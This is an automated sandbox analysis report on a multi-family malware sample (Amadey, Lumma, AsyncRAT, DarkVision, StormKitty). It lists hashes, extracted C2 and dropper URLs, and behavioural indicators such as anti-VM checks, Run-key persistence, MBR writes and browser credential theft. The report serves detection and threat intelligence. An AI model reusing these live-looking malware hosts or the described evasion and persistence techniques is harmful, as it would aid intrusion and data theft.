amadey | e5d1248f79c21f019b5b3659cbe6007f38778f209605c3130e92698dac091193

Analysis

max time kernel
146s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
07/04/2025, 15:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

bd4e8ee0fbfcb3a79fac670043fca8ef
SHA1

c250e0ab9cc47cf382d18a613dad086cd9157225
SHA256

e5d1248f79c21f019b5b3659cbe6007f38778f209605c3130e92698dac091193
SHA512

1b9ef995e61b4115549eaa18457ad4d201d4bcab9b33d21c103cec6a8f339d33ba681d1e45e5b8441d4853f0b7328cdc01aabefa4986e1816d0bf76737c4412e
SSDEEP

24576:RqDEvCTbMWu7rQYlBQcBiT6rprG8a4Eu:RTvC/MTQYxsWR7a4E

Score

10^/10

amadey asyncrat darkvision lumma stormkitty 092155 bootkit defense_evasion discovery execution persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://easyfwdr.digital/azxs

https://jjrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://upuerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://furthert.run/azpp

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://jrxsafer.top/shpaoz

https://puerrogfh.live/iqwez

https://uywmedici.top/noagis

https://2travelilx.top/GSKAiz

https://-furthert.run/azpp

https://xrfxcaseq.live/gspaz

https://gkrxspint.digital/kendwz

https://erhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://advennture.top/GKsiio

Extracted

Family

darkvision

82.29.67.160

Attributes

url
http://107.174.192.179/data/003

https://grabify.link/ZATFQO

http://107.174.192.179/clean
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/7840-26556-0x0000000000400000-0x000000000073C000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	60692a6a88.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6a92a7a526.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
22	3636	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4128	powershell.exe
3636	powershell.exe

Downloads MZ/PE file 15 IoCs

flow	pid	Process
34	1320	rapes.exe
34	1320	rapes.exe
34	1320	rapes.exe
34	1320	rapes.exe
34	1320	rapes.exe
175	1320	rapes.exe
175	1320	rapes.exe
246	1320	rapes.exe
246	1320	rapes.exe
246	1320	rapes.exe
246	1320	rapes.exe
246	1320	rapes.exe
246	1320	rapes.exe
249	5960	svchost.exe
22	3636	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\442fab23.sys	e2fdaeb4.exe
File created	C:\Windows\System32\Drivers\klupd_442fab23a_arkmon.sys	e2fdaeb4.exe
File created	C:\Windows\System32\Drivers\klupd_442fab23a_klbg.sys	e2fdaeb4.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_442fab23a_klark\ImagePath = "System32\\Drivers\\klupd_442fab23a_klark.sys"	e2fdaeb4.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_442fab23a_mark\ImagePath = "System32\\Drivers\\klupd_442fab23a_mark.sys"	e2fdaeb4.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_442fab23a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_442fab23a_arkmon.sys"	e2fdaeb4.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\442fab23\ImagePath = "System32\\Drivers\\442fab23.sys"	e2fdaeb4.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_442fab23a_arkmon\ImagePath = "System32\\Drivers\\klupd_442fab23a_arkmon.sys"	e2fdaeb4.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_442fab23a_klbg\ImagePath = "System32\\Drivers\\klupd_442fab23a_klbg.sys"	e2fdaeb4.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	60692a6a88.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	de50cd8cf1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6a92a7a526.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	60692a6a88.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	de50cd8cf1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6a92a7a526.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE

Deletes itself 1 IoCs

pid	Process
3328	w32tm.exe

Executes dropped EXE 26 IoCs

pid	Process
5068	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
1320	rapes.exe
2304	31W3sid.exe
1208	NlmvJyQ.exe
716	60692a6a88.exe
1136	de50cd8cf1.exe
4564	6b65999cd8.exe
5880	1cbb3f6a9a.exe
5928	rapes.exe
3828	3d57c52eef.exe
5272	NlmvJyQ.exe
2976	Nehh6wZ.exe
1016	qhjMWht.exe
4536	AfkeY2q.exe
2868	6a92a7a526.exe
5832	UZPt0hR.exe
5324	tzutil.exe
3328	w32tm.exe
13040	rapes.exe
13244	ibC8xs1.exe
13292	6d275763.exe
6664	e2fdaeb4.exe
6524	exp.exe
7940	v1BRaoR.exe
8364	Rm3cVPI.exe
8784	9sWdA2p.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	6a92a7a526.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	60692a6a88.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\442fab23.sys	e2fdaeb4.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\442fab23.sys\ = "Driver"	e2fdaeb4.exe

Loads dropped DLL 25 IoCs

pid	Process
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6b65999cd8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494750101\\6b65999cd8.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	ibC8xs1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\df9f729c-3a70-4a45-9f96-8bea6ca43aa9 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{71a380a8-8dfd-4eaf-9ef6-405be2d55924}\\df9f729c-3a70-4a45-9f96-8bea6ca43aa9.cmd\""	e2fdaeb4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\60692a6a88.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494730101\\60692a6a88.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\de50cd8cf1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494740101\\de50cd8cf1.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	e2fdaeb4.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
234	raw.githubusercontent.com
233	raw.githubusercontent.com

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	6a92a7a526.exe
File opened for modification	\??\PhysicalDrive0	e2fdaeb4.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0009000000022b7d-119.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
5068	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
1320	rapes.exe
716	60692a6a88.exe
5928	rapes.exe
2868	6a92a7a526.exe
13040	rapes.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 2304 set thread context of 3588	2304	31W3sid.exe	109
PID 1208 set thread context of 4676	1208	NlmvJyQ.exe	111
PID 5272 set thread context of 5332	5272	NlmvJyQ.exe	150
PID 2976 set thread context of 5532	2976	Nehh6wZ.exe	153
PID 4536 set thread context of 5368	4536	AfkeY2q.exe	156
PID 13244 set thread context of 7088	13244	ibC8xs1.exe	179
PID 6524 set thread context of 2168	6524	exp.exe	192
PID 7940 set thread context of 7840	7940	v1BRaoR.exe	194

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000024098-1365.dat	upx

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	6d275763.exe
File opened (read-only)	\??\VBoxMiniRdrDN	e2fdaeb4.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{90C11C8A-AD21-4E7E-BDFA-BD9C724A6087}	msiexec.exe
File created	C:\Windows\Installer\e582f48.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e582f48.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI32C3.tmp	msiexec.exe
File created	C:\Windows\Installer\e582f4c.msi	msiexec.exe
File created	C:\Windows\Tasks\rapes.job	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	e2fdaeb4.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	e2fdaeb4.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
8304	7840	WerFault.exe	194
8448	7088	WerFault.exe	179
8480	7088	WerFault.exe	179

System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1cbb3f6a9a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AfkeY2q.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e2fdaeb4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	60692a6a88.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	6b65999cd8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6a92a7a526.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	6b65999cd8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6d275763.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6b65999cd8.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe

Checks processor information in registry 2 TTPs 39 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	MSBuild.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
2388	taskkill.exe
1012	taskkill.exe
4660	taskkill.exe
1124	taskkill.exe
4452	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A8C11C0912DAE7E4DBAFDBC927A40678\DefaultFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\ProductName = "BatchInstallerFinal"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Version = "16777216"	msiexec.exe
